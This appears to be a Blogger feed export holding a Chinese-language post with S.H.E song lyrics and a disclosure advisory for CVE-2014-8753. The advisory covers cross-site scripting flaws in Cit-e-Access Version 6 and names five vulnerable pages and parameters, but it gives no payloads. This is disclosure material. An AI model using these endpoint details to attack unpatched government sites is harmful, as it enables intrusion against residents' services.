<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-47132457380961802782015-06-07T01:40:00.002-07:002015-06-07T02:08:51.817-07:00熱帶雨林 - S.H.E - 青春株式會社 柔美溫和華文歌曲<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishnCXvf1CNdT_WgtPpV-YDLRokOu1-An5LBySBuGhWpqtjgPteKulOpXeL1p5tcoicwtkmRsgn5FC0fNkOPEhijqkGQE48asWc6Wi1wcrp8lDaJaUYym93nWW-gEg8MG9Hlxn36dKCgL2/s1600/48.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishnCXvf1CNdT_WgtPpV-YDLRokOu1-An5LBySBuGhWpqtjgPteKulOpXeL1p5tcoicwtkmRsgn5FC0fNkOPEhijqkGQE48asWc6Wi1wcrp8lDaJaUYym93nWW-gEg8MG9Hlxn36dKCgL2/s400/48.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">高
中的時候,第壹次從同學那聽到這首歌,喜歡無比。如今,多年已過,物是人非,做壹視頻以自慰,紀念曾經的青春。"熱帶雨林"
采用柔美溫和的旋律,讓人容易回憶起往事,采用傷感又令人感動的歌詞,易引起聽眾的共鳴。歌曲通過三人的完美配合,表達出了青春期少男少女中感情受困如置
身夢境、迷失在熱帶雨林的感覺</span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">音樂<br />所屬專輯: "青春株式會社"<br />歌曲原唱: SHE - 任家萱(Selina)、田馥甄(Hebe)、陳嘉樺(Ella)<br />填詞: 方文山<br />譜曲: 周傑倫</span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">歌曲歌詞<br />冷風過境 回憶凍結成冰<br />我的付出全都要不到回音<br />悔恨就象是綿延不斷的丘陵<br />痛苦全方位的降臨<br />悲傷入侵<br />誓言下落不明我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心<br />悲傷入侵 誓言下落不明<br />我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心</span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">制作: 谷雨 (Essayjeans) <a href="https://twitter.com/justqdjing/status/586520579353640960">@justqdjing</a><br />圖片: 來自網上<br /><a href="http://www.tetraph.com/blog/essayjeans/">http://www.tetraph.com/blog/essayjeans/</a><br /><br /></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br />視頻地址: <a href="https://www.youtube.com/watch?v=VNi6oIf_u3Y">https://www.youtube.com/watch?v=VNi6oIf_u3Y</a><br />歌詞鏈接: <a href="http://essayjeans.blog.163.com/blog/static/23717307420155744626301/">http://essayjeans.blog.163.com/blog/static/23717307420155744626301/</a><br />推特: <a href="https://twitter.com/essayjeans/status/607468881662214144">https://twitter.com/essayjeans/status/607468881662214144</a><br />樂乎: <a href="http://aibiyi.lofter.com/post/1cc9f4e9_735dd83">http://aibiyi.lofter.com/post/1cc9f4e9_735dd83</a><br />湯博樂: <a href="http://canghaixiao.tumblr.com/post/120922254507">http://canghaixiao.tumblr.com/post/120922254507</a><br />谷歌+: <a href="https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6">https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6</a><br />非死不可: <a href="https://www.facebook.com/essayjeans/posts/840142132743607">https://www.facebook.com/essayjeans/posts/840142132743607</a></span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-65966077213115753232015-06-06T20:40:00.000-07:002015-06-06T20:40:41.730-07:00CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6QyW3BV_ft4J5q3bVtcy-tZ_QQhTEtHfIrXCdEFOakAmcNJnnkl6WOpX-AQI14lNtMbn-cUXfPO-4styx4701rrHWtxKCwoOx3DdxJlLfzynuyo8U_QZ0r9yjcE-PoR9ShQyRxUKpc0/s1600/cit_e_net.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6QyW3BV_ft4J5q3bVtcy-tZ_QQhTEtHfIrXCdEFOakAmcNJnnkl6WOpX-AQI14lNtMbn-cUXfPO-4styx4701rrHWtxKCwoOx3DdxJlLfzynuyo8U_QZ0r9yjcE-PoR9ShQyRxUKpc0/s400/cit_e_net.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong>CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</strong></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: Cit-e-Access</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: Cit-e-Net</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: Version 6</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: Version 6</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: February 12, 2015</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: June 01, 2015</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Scripting [CWE-79]</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: CVE-2014-8753</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Author: <span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (</span><a href="https://twitter.com/justqdjing/status/565810093564772352">@justqdjing</a><span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">)</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Instruction Details:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vendor & Product Description:</span></strong></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version: </span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Version 6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download: </span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net can be downloaded from here,</span></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.cit-e.net/<wbr></wbr>citeadmin/help/<wbr></wbr>cntrainingmanualhowto.pdf</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://demo.cit-e.net/" href="http://demo.cit-e.net/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://demo.cit-e.net/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://www.cit-e.net/demorequest.cfm" href="http://www.cit-e.net/demorequest.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/<wbr></wbr>demorequest.cfm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" target="_blank">http://demo.cit-e.net/Cit-e-<wbr></wbr>Access/ServReq/?TID=1&TPID=17</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"We are a premier provider of Internet-based solutions encompassing web site development and modular interactive e-government applications which bring local government, residents and community businesses together.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net provides a suite of on-line interactive services to counties, municipalities, and other government agencies, that they in turn can offer to their constituents. The municipal government achieves a greater degree of efficiency and timeliness in conducting the daily operations of government, while residents receive improved and easier access to city hall through the on-line access to government services.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Our web-based applications can help your municipality to acheive its e-government goals. Type & click website content-management empowers the municipality to manage the website quickly and easily. Web page styles & formats are customizable by the municipality, and because the foundation is a database application, user security can be set for individual personnel and module applications. Our application modules can either be integrated into your existing municipal web site or implemented as a complete web site solution. It's your choice! Please contact us at info@cit-e.net to view a demonstration of our municipal web site solution if you are an elected official or member of municipal management and your municipality is looking for a cost efficient method for enhancing & improving municipal services. </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Interactive Applications</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Service Requests</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Tax Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Utility Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online General-Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Submit Volunteer Resume's Online for the municipality to match your skills with available openings."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access <span style="background-color: white;">web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.</span></span></div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several similar products 0Day vulnerabilities have been found by some other bug hunter researchers before. Cit-i-Access has patched some of them. Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, solutions details related to important vulnerabilities and cyber intelligence.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.1)</strong><span class="Apple-converted-space"> </span>The first programming code flaw occurs at "/eventscalendar/index.cfm?" page with "&DID" parameter in HTTP GET.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.2)</strong><span class="Apple-converted-space"> </span>The second programming code flaw occurs at "/search/index.cfm?" page with "&keyword" parameter in HTTP POST.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.3)</strong><span class="Apple-converted-space"> </span>The third programming code flaw occurs at "/news/index.cfm" page with "&jump2" "&DID" parameter in HTTP GET.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.4)</strong><span class="Apple-converted-space"> </span>The fourth programming code flaw occurs at "eventscalendar?" page with "&TPID" parameter in HTTP GET.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.5)</strong><span class="Apple-converted-space"> </span>The fifth programming code flaw occurs at "/meetings/index.cfm?" page with "&DID" parameter in HTTP GET.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong>(3) Solutions:</strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Leave message to vendor. No response.</span></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://www.cit-e.net/contact.cfm" href="http://www.cit-e.net/contact.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/contact.<wbr></wbr>cfm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">References:</span></strong></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Feb/48">http://seclists.org/fulldisclosure/2015/Feb/48</a></span></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/13/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/13/2</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://computerpitch.wordpress.com/2015/06/07/cve-2014-8753/" style="background-color: white;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computerpitch.<wbr></wbr>wordpress.com/2015/06/07/cve-<wbr></wbr>2014-8753/</span></a></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://webtechhut.blogspot.com/2015/06/cve-2014-8753.html" target="_blank">http://webtechhut.blogspot.<wbr></wbr>com/2015/06/cve-2014-8753.html</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/804176613035844">https://www.facebook.com/websecuritiesnews/posts/804176613035844</a></span></div>
<div style="background-color: white;">
<div>
<a href="https://twitter.com/tetraphibious/status/607381197077946368" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>607381197077946368</span></a></div>
<div>
<a href="http://biboying.lofter.com/post/1cc9f4f5_7356826" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://biboying.lofter.com/<wbr></wbr>post/1cc9f4f5_7356826</span></a></div>
<div>
<a href="http://shellmantis.tumblr.com/post/120903342496/securitypost-cve-2014-8753-cit-e-net-multiple" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://shellmantis.tumblr.com/<wbr></wbr>post/120903342496/<wbr></wbr>securitypost-cve-2014-8753</span></a></div>
</div>
<div style="background-color: white;">
<a href="http://itprompt.blogspot.com/2015/06/cve-2014-8753.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itprompt.blogspot.com/<wbr></wbr>2015/06/cve-2014-8753.html</span></a></div>
<div style="background-color: white;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155710559404/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155710559404/</span></a></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/113115469311022848114/posts/FomMK9BGGx2" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/<wbr></wbr>113115469311022848114/posts/<wbr></wbr>FomMK9BGGx2</span></a></div>
<div style="background-color: white;">
<a href="https://www.facebook.com/pcwebsecurities/posts/702290949916825"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/pcwebsecurities/posts/702290949916825</span></a></div>
<div style="background-color: white;">
<a href="http://securitypost.tumblr.com/post/120903225352/cve-2014-8753-cit-e-net-multiple-xss" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.<wbr></wbr>com/post/120903225352/cve-<wbr></wbr>2014-8753-cit-e-net</span></a></div>
<div style="background-color: white;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_7355910" style="background-color: transparent;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/<wbr></wbr>post/1cd3e0d3_7355910</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/" href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/">http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/</a></span></div>
<div style="margin: 0px;">
<a data-mce-href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/" href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/cve-2014-8753/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
